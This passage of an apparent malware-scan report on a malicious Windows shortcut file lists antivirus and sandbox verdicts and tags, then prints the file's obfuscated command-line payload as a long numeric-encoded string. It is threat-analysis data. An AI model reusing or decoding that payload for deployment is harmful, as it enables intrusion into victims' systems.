"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260413",
"category": "malicious",
"result": "BehavesLike.Trojan.dl"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.214",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.47.59188",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.47.59188",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Baidu": {
"method": "blacklist",
"engine_name": "Baidu",
"engine_version": "1.0.0.2",
"engine_update": "20190318",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1185",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260414",
"category": "malicious",
"result": "TROJ_FRS.0NA103CR26"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260414",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5580",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260414",
"category": "malicious",
"result": "TROJ_FRS.0NA103CR26"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14392",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.4.1.0",
"engine_update": "20260414",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "8da278c:8da278c:a198e11:a198e11",
"engine_update": "20260413",
"category": "malicious",
"result": "HEUR:Trojan/LNK.Agent.b"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260412",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260414",
"category": "malicious",
"result": "LNK/ABTrojan.YQZV-"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.243.174",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26030.3008",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan:Win32/Ravartar!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.23-113519599",
"engine_update": "20260414",
"category": "malicious",
"result": "Mal/LnkObf-A"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1776142840",
"engine_update": "20260414",
"category": "malicious",
"result": "Detected"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.29.3.10609",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-04-14.01",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260413",
"category": "malicious",
"result": "Trojan-Downloader.PS.Agent"
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260414",
"category": "malicious",
"result": "Win32.Trojan.Agent.Uwhl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260413",
"category": "malicious",
"result": "Trojan-JACI!302725413076"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.30.0",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Kimsuky.AM"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44185AVA:64.31031",
"engine_update": "20260414",
"category": "confirmed-timeout",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260413",
"category": "timeout",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": null,
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": null,
"engine_update": "20260413",
"category": "timeout",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260414",
"category": "timeout",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260322",
"category": "failure",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260407",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260413-00",
"engine_update": "20260413",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20251216",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.255",
"engine_update": "20260327",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.769",
"engine_update": "20260413",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.11.0",
"engine_update": "20260331",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260410",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260414",
"category": "type-unsupported",
"result": null
}
},
"size": 987042,
"last_analysis_stats": {
"malicious": 20,
"suspicious": 0,
"undetected": 28,
"harmless": 0,
"timeout": 12,
"confirmed-timeout": 1,
"failure": 3,
"type-unsupported": 12
},
"filecondis": {
"dhash": "b3a0b49a9092a382",
"raw_md5": "0e5a15f0d054bcbfddecd5fd3f7db1c4"
},
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 68
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"sigma_analysis_stats": {
"critical": 0,
"high": 4,
"medium": 3,
"low": 3
},
"last_analysis_date": 1776146239,
"ssdeep": "1536:FJbFi322qPJ2XN/eNYPKPfuuzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzH:FJbFi322qPJ2XN/eNYPKPfuT",
"last_modification_date": 1776153895,
"sigma_analysis_summary": {
"Joe Security Rule Set (GitHub)": {
"critical": 0,
"high": 1,
"medium": 0,
"low": 0
},
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 3,
"medium": 3,
"low": 3
}
},
"total_votes": {
"harmless": 0,
"malicious": 1
},
"magika": "LNK",
"tags": [
"large-file",
"hiding-window",
"long-command-line-arguments",
"lnk",
"detect-debug-environment",
"abused-exe-pattern",
"executes-dropped-file"
],
"type_extension": "lnk",
"times_submitted": 2,
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": " \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 115 106 89 102 123 126 140 116 124 93 98 112 147 130 140 43 50 106 158 183 84 75 128 60 124 97 167 106 72 139 115 123 61 24 94 110 74 141 113 127 124 37 93 105 84 57 129 52 72 25 93 96 66 68 84 58 101 55 89 169 129 51 126 75 60 70 146 146 110 96 120 82 77 28 83 138 75 104 99 59 74 28 86 128 71 91 125 70 39 84 155 169 132 127 125 104 109 41 101 98 72 124 76 125 99 108 165 105 67 62 68 58 59 24 128 117 149 112 142 125 51 39 83 112 71 128 71 45 47 23 89 164 132 125 125 104 109 89 154 103 76 126 70 54 56 39 87 183 122 137 76 45 61 30 102 113 103 76 65 58 126 79 169 183 72 76 69 49 124 81 169 181 79 68 66 58 78 43 85 113 149 112 142 125 58 29 102 97 135 61 74 57 124 81 165 117 62 65 66 51 50 108 140 185 147 137 71 43 42 24 85 170 84 61 69 112 40 88 154 105 67 62 68 58 59 24 86 170 145 133 83 42 44 35 108 159 123 104 59 60 61 28 100 149 84 57 77 76 42 26 96 107 78 133 138 47 44 29 95 116 82 57 101 59 117 99 154 103 80 61 63 44 53 24 90 103 60 126 72 54 50 39 86 170 145 133 83 42 44 35 108 159 123 104 59 60 61 28 100 149 84 57 77 76 42 26 96 107 78 133 138 57 53 32 100 137 84 57 70 118 117 93 87 120 62 110 60 58 56 79 165 119 67 76 64 60 54 62 104 108 80 139 115 127 122 43 98 116 71 57 113 119 124 63 90 95 76 65 66 62 111 87 155 169 147 129 140 119 71 35 91 117 70 54 59 125 114 106 169 139 97 141 125 111 112 92 142 185 94 68 64 125 114 106 147 165 122 141 54 105 106 99 167 173 147 108 62 47 50 39 114 116 147 129 140 61 83 35 85 170 128 122 119 113 107 86 167 173 147 133 99 87 74 63 125 173 73 68 67 58 126 
69 100 118 74 62 133 125 114 106 134 113 67 139 130 125 47 31 100 183 137 139 127 110 106 87 167 173 147 125 128 111 124 96 167 171 133 127 126 125 114 106 118 120 79 76 60 54 111 87 150 162 135 122 120 125 117 108 156 111 70 68 64 127 124 108 167 158 149 137 70 58 61 40 100 103 66 141 113 127 94 17 167 137 99 100 88 94 74 71 156 133 102 98 105 81 124 108 140 185 145 76 58 52 51 33 76 158 149 100 64 41 47 33 100 172 99 72 59 43 81 39 85 113 70 73 142 114 73 26 96 185 145 73 55 51 50 32 93 185 136 101 73 62 58 39 87 102 149 137 70 58 61 40 100 103 66 141 129 74 43 39 87 152 78 72 64 43 126 104 104 114 80 63 58 127 113 61 84 101 111 68 66 58 126 104 80 96 60 73 142 114 73 25 100 151 84 58 69 60 78 43 87 102 76 63 71 100 120 104 80 96 60 73 115 127 126 104 86 102 66 141 113 127 84 29 96 107 136 93 77 43 54 108 161 181 80 63 56 101 93 28 89 149 84 57 77 118 126 106 154 140 76 74 60 48 43 29 99 101 134 86 69 49 58 29 82 102 134 89 73 50 46 32 104 101 80 58 127 70 61 36 90 106 135 67 59 58 124 81 169 181 70 62 63 127 97 108 127 106 76 63 129 79 61 24 97 185 141 137 73 49 40 82 136 105 69 105 77 43 61 99 169 183 134 96 69 60 44 29 86 106 79 57 127 72 53 30 101 106 62 58 127 75 57 31 89 109 84 57 73 44 111 51 104 113 70 62 128 45 42 38 167 158 149 137 52 48 47 39 169 156 149 139 85 62 54 29 90 171 67 57 72 125 99 104 100 103 83 98 99 86 126 79 169 183 145 70 58 43 42 24 154 120 69 68 127 41 106 93 89 103 70 67 73 60 42 25 154 181 141 82 57 45 53 47 143 159 112 58 75 62 46 39 133 120 65 76 91 43 44 35 91 114 141 137 62 45 47 34 100 118 65 100 74 118 117 93 87 116 69 62 59 54 42 29 87 96 134 71 69 51 57 25 154 181 141 82 57 45 53 47 143 159 112 58 75 62 46 39 133 120 65 76 91 43 44 35 91 114 141 137 52 48 47 39 160 176 134 59 77 40 95 26 100 115 120 137 76 45 61 30 102 113 103 76 65 58 124 81 169 144 71 55 63 52 57 95 114 116 83 91 73 46 41 39 86 101 149 128 89 45 53 108 165 116 67 75 99 84 85 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 
98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 47 29 90 185 136 88 59 58 92 43 86 112 82 93 77 45 43 35 91 114 122 141 60 58 48 43 92 116 136 68 58 58 49 108 156 105 84 57 70 127 122 29 90 106 149 128 64 58 39 30 104 108 80 141 138 44 43 25 142 185 149 137 62 47 46 108 140 185 107 62 69 49 113 60 104 101 77 141 134 123 57 30 83 159 116 61 62 91 61 24 104 176 149 139 127 82 53 41 87 106 66 62 72 43 111 53 96 107 81 62 55 44 111 73 93 106 64 73 91 43 47 26 100 170 79 76 75 58 60 29 90 110 135 61 59 110 124 81 169 181 66 57 60 127 97 108 162 181 84 65 69 44 97 76 161 183 72 62 60 38 75 24 167 173 147 117 117 103 124 96 167 149 80 59 69 41 57 106 160 158 145 64 59 98 113 34 90 112 71 141 134 125 81 39 167 173 145 76 66 54 43 49 153 124 137 139 60 58 61 31 167 176 122 137 60 57 97 95 95 106 76 63 134 125 76 38 102 167 147 129 138 62 50 35 86 126 132 80 130 123 61 32 96 102 90 123 81 115 124 74 80 101 80 58 140 118 99 104 86 101 67 112 110 119 122 31 86 173 147 59 53 47 42 29 167 173 145 59 72 115 126 106 100 102 104 76 64 62 55 106 157 185 147 59 73 62 124 99 142 181 67 72 62 98 94 100 167 108 66 53 140 115 124 26 81 183 137 139 92 89 90 74 167 173 147 64 77 49 55 106 157 185 147 71 72 125 117 81 165 117 80 71 142 98 126 106 84 102 76 63 71 127 75 19 86 101 80 64 115 42 43 35 91 114 149 90 53 44 42 39 92 171 108 94 115 42 43 35 91 114 149 90 53 44 42 39 92 171 98 72 75 42 44 35 85 96 135 106 60 39 55 26 104 105 77 52 115 47 41 42 93 112 82 141 75 51 61 25 86 185 108 63 69 43 35 28 84 119 73 68 75 127 43 24 104 101 76 74 142 93 37 24 100 126 88 141 106 58 59 100 135 96 65 72 83 66 126 35 91 151 60 57 73 44 114 25 85 103 76 63 71 127 46 21 101 176 58 64 59 39 126 35 92 156 71 72 55 127 49 25 81 177 76 63 108 38 42 39 86 176 122 107 53 43 57 49 108 185 66 112 64 58 39 108 135 96 65 72 83 108 108 47 142 112 71 57 142 51 57 30 140 112 72 127 92 58 61 40 161 102 137 125 130 44 112 64 100 107 78 57 70 118 99 35 99 177 73 72 64 126 97 25 155 141 80 
63 71 43 54 99 78 103 80 57 57 45 48 108 91 100 73 65 115 34 92 19 85 116 90 80 142 60 60 64 100 107 120 63 73 40 126 74 80 101 80 82 122 66 99 35 92 171 99 72 77 59 118 41 103 141 80 63 130 111 114 88 160 158 99 103 106 93 126 28 103 110 120 63 73 40 126 58 131 149 115 133 62 40 58 96 86 176 122 107 53 43 57 49 108 185 74 72 53 98 46 42 94 171 110 72 58 93 37 24 100 102 141 122 124 118 99 74 80 101 80 82 81 127 53 22 140 105 83 66 128 88 57 24 135 96 65 72 59 119 109 86 160 158 116 64 77 49 55 39 101 185 72 76 113 49 57 21 169 152 72 76 64 56 57 40 161 176 122 100 107 45 38 56 87 120 71 58 72 48 44 31 169 149 80 74 113 50 61 94 134 115 79 57 73 91 57 41 87 97 67 133 67 58 37 96 96 99 140 114 107 45 38 57 85 115 79 64 142 60 43 79 91 116 62 141 107 45 38 57 85 115 79 64 134 54 49 96 133 116 82 129 126 118 99 31 86 97 149 62 65 98 48 39 82 185 72 58 54 119 117 81 102 102 135 106 63 47 37 56 90 177 70 64 133 100 47 31 155 149 76 58 62 48 43 39 161 176 122 59 73 43 41 26 91 185 70 64 128 75 47 75 87 103 84 52 134 118 99 15 76 183 122 137 69 98 110 81 165 120 120 137 69 116 122 43 87 114 66 82 125 66 99 104 89 156 147 69 63 48 46 106 142 181 66 112 110 119 124 82 167 173 147 58 116 125 117 81 165 103 120 137 62 127 113 26 100 105 73 76 75 58 126 106 90 183 137 139 58 125 99 38 90 103 80 76 75 55 118 104 96 101 80 64 142 54 48 108 165 103 80 61 133 36 122 40 100 115 120 137 74 58 56 108 156 103 80 61 66 62 59 39 169 181 76 57 73 50 114 104 86 101 67 82 138 54 65 81 165 112 138 130 115 34 93 40 101 172 97 52 62 58 126 95 117 96 69 72 106 58 56 35 91 112 65 68 63 49 126 104 101 116 79 114 138 47 39 40 169 156 149 139 99 54 82 64 121 162 66 58 139 125 99 104 100 116 80 141 113 127 84 29 96 107 136 93 77 43 54 108 161 181 80 63 56 101 93 28 89 149 84 57 77 118 126 106 91 116 62 58 128 47 43 91 167 158 145 70 58 43 42 24 169 156 149 139 70 43 42 28 86 159 134 126 71 54 42 32 104 119 135 74 63 50 124 81 165 120 65 66 67 52 126 79 169 183 78 65 62 62 42 95 94 131 66 65 53 44 
53 50 100 160 96 61 126 107 36 92 117 119 111 118 103 88 81 86 124 136 69 55 95 53 89 65 101 133 69 58 85 49 76 91 112 98 125 127 126 110 112 91 146 168 82 73 55 50 109 42 167 158 145 61 60 48 52 39 102 101 108 73 142 98 126 106 94 116 63 68 64 114 55 26 90 100 69 120 125 111 109 85 152 166 134 59 69 112 54 35 99 116 67 139 115 123 60 26 104 107 82 69 96 62 49 39 169 156 149 139 65 62 53 30 167 158 145 71 69 51 57 60 104 101 77 141 113 127 124 25 102 120 73 65 128 43 38 24 167 158 145 73 55 51 50 32 93 185 120 141 140 123 55 24 85 101 65 126 77 47 53 93 83 165 134 61 60 48 52 39 102 101 66 126 138 119 67 23 87 112 88 115 116 90 43 41 104 105 80 105 77 43 61 57 85 103 76 63 71 119 122 28 87 106 75 72 75 43 85 40 160 176 134 59 73 47 47 25 96 101 70 59 53 112 56 35 93 116 66 126 138 119 67 23 87 112 88 115 116 90 43 41 104 105 80 105 77 43 61 57 85 103 76 63 71 119 122 38 96 109 80 93 77 43 54 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 104 104 114 80 63 58 98 118 106 124 106 59 68 66 51 61 93 148 171 133 139 130 125 118 53 96 107 81 62 55 44 124 96 167 185 103 89 142 110 110 94 153 158 149 86 69 49 124 96 167 163 129 114 142 39 104 88 160 183 137 139 109 47 46 32 100 130 80 139 130 125 60 65 96 101 134 120 123 104 112 89 147 183 137 139 134 84 86 56 124 141 137 65 69 52 57 108 130 116 82 66 63 118 124 96 167 150 77 59 140 115 124 29 92 116 147 129 140 112 109 88 148 183 137 139 126 113 110 106 157 183 135 125 128 111 124 96 167 134 84 71 77 45 53 93 148 166 126 127 123 105 124 99 169 172 75 62 69 49 126 106 169 183 122 137 70 58 61 40 100 103 66 141 113 127 94 17 167 137 99 100 88 94 74 71 156 133 102 98 105 81 124 108 140 185 145 76 58 52 51 33 76 158 145 59 73 44 46 29 91 102 80 141 113 127 85 30 83 106 74 72 129 72 57 42 119 116 68 56 73 44 42 108 156 132 67 68 142 123 58 21 93 109 73 65 142 114 86 39 104 117 80 59 59 127 122 36 100 120 81 72 60 44 126 95 116 102 80 59 109 56 57 30 85 185 145 76 71 58 48 24 169 172 96 58 73 93 61 
25 96 118 101 76 60 44 53 30 98 158 90 107 53 43 57 49 108 124 145 75 53 43 57 25 169 156 149 137 60 58 43 28 90 107 66 72 128 92 47 30 85 116 71 57 115 68 92 19 85 116 90 80 81 123 58 39 102 119 60 57 73 44 97 49 128 107 76 57 81 101 100 72 100 118 141 137 76 38 42 39 86 173 145 61 55 59 117 81 110 134 60 58 58 58 49 94 117 116 61 57 128 90 48 41 90 117 76 63 71 66 100 82 136 134 114 100 101 113 87 39 85 134 65 59 69 49 55 100 165 117 80 74 76 38 42 39 86 176 57 141 95 42 42 95 131 112 73 72 142 114 88 35 93 116 101 76 58 55 126 104 100 116 80 141 129 90 48 41 90 117 76 63 71 127 41 24 99 161 122 90 58 62 44 24 156 137 67 62 75 58 43 25 169 105 70 54 73 45 43 36 100 109 73 141 129 94 44 37 84 108 80 63 58 83 53 25 85 185 147 128 96 48 78 26 90 115 76 65 73 127 113 71 81 116 82 56 58 54 47 30 121 106 73 68 75 38 126 74 80 105 84 58 59 127 113 70 96 109 80 141 138 58 57 39 167 185 136 86 69 49 58 29 82 134 65 52 66 58 126 68 96 117 81 72 64 100 119 81 169 181 66 57 60 127 34 108 122 100 65 128 104 54 50 39 169 172 111 68 66 58 78 43 85 113 149 137 62 47 46 108 156 148 71 74 63 59 53 30 98 185 96 89 104 103 99 108 165 120 82 57 69 48 48 108 140 185 103 72 55 114 75 41 97 116 81 56 66 58 58 56 104 102 74 108 75 43 53 29 91 185 136 104 54 58 59 23 85 116 149 139 55 44 59 26 96 105 65 127 73 39 57 106 169 172 116 59 71 42 49 39 91 101 149 139 127 112 60 108 154 170 71 62 66 48 55 29 169 121 147 137 59 44 43 44 167 183 122 141 138 43 44 35 98 114 80 59 142 98 126 62 100 98 136 90 75 55 57 40 84 109 80 73 90 62 43 33 117 103 76 70 71 58 44 108 156 138 71 74 73 127 113 75 85 185 141 102 73 43 113 72 104 101 80 132 128 94 58 40 124 112 71 56 58 58 43 100 152 169 140 141 129 77 57 28 100 101 76 57 69 48 48 67 91 101 80 59 56 62 50 108 161 139 80 54 129 75 53 31 100 134 69 76 64 127 113 63 96 107 64 57 73 44 126 89 153 176 122 141 138 44 57 24 85 112 71 70 59 127 97 108 123 116 62 128 91 60 54 39 101 100 73 72 74 75 61 25 94 134 80 57 58 54 48 37 86 134 80 57 142 114 86 35 
101 117 80 63 115 127 76 39 98 112 66 57 73 45 113 57 102 113 80 73 57 51 57 40 117 120 66 66 142 114 74 43 86 110 103 76 65 58 126 106 124 112 82 59 63 44 47 38 85 148 81 70 73 74 46 40 104 101 80 89 77 44 51 63 104 118 77 68 64 58 90 72 131 138 94 92 62 36 88 89 148 169 131 124 118 108 105 95 150 164 99 128 122 94 108 70 156 166 92 117 89 114 107 66 145 162 101 123 100 87 87 55 76 183 149 128 109 60 42 35 90 107 149 137 77 60 42 35 90 107 149 128 90 45 53 37 98 116 67 141 138 43 44 35 98 114 80 59 142 114 75 39 85 101 76 63 71 44 126 104 86 116 65 57 69 49 55 25 142 185 145 72 73 58 126 79 169 143 70 68 64 114 78 43 85 113 149 133 138 58 48 22 143 152 69 61 106 62 42 43 160 185 147 63 73 40 43 94 89 102 132 139 115 127 126 104 104 109 76 58 113 95 118 106 92 106 67 52 91 43 124 96 167 161 124 117 140 115 124 72 100 103 76 55 73 125 117 81 165 108 66 112 129 53 47 35 91 185 141 139 97 58 124 96 165 120 73 68 59 68 110 47 157 183 67 72 77 50 124 99 142 181 67 71 113 114 52 29 96 107 141 139 92 57 59 90 167 173 145 76 66 54 43 49 152 124 137 137 77 51 53 25 110 167 88 129 140 93 37 24 100 102 147 132 115 123 43 24 87 156 117 133 138 50 43 96 167 103 60 61 58 48 124 96 165 103 79 129 142 125 57 25 124 120 71 76 71 125 114 108 167 103 80 76 140 118 99 104 87 116 69 112 110 119 124 31 86 97 147 129 140 45 38 106 157 183 99 103 106 93 124 96 167 108 84 63 71 125 114 108 167 115 79 139 133 100 122 40 100 115 149 112 142 125 41 25 96 107 78 141 91 38 43 24 100 108 122 56 59 54 48 37 169 134 60 58 58 58 49 94 128 138 122 56 59 54 48 37 169 134 60 58 58 58 49 94 118 116 82 56 60 54 42 19 155 150 67 53 71 45 61 28 97 96 122 61 57 61 50 35 102 185 82 65 77 44 43 108 128 107 76 57 51 47 41 42 93 112 82 141 59 43 61 24 96 118 149 107 53 43 57 49 108 185 113 72 75 119 92 19 85 116 90 80 142 54 48 74 80 101 80 58 130 44 42 26 96 107 78 141 62 40 58 99 78 108 66 53 142 54 49 79 91 116 62 141 65 44 38 100 96 107 115 52 58 58 43 99 142 151 60 57 73 68 65 108 86 156 71 72 55 127 92 
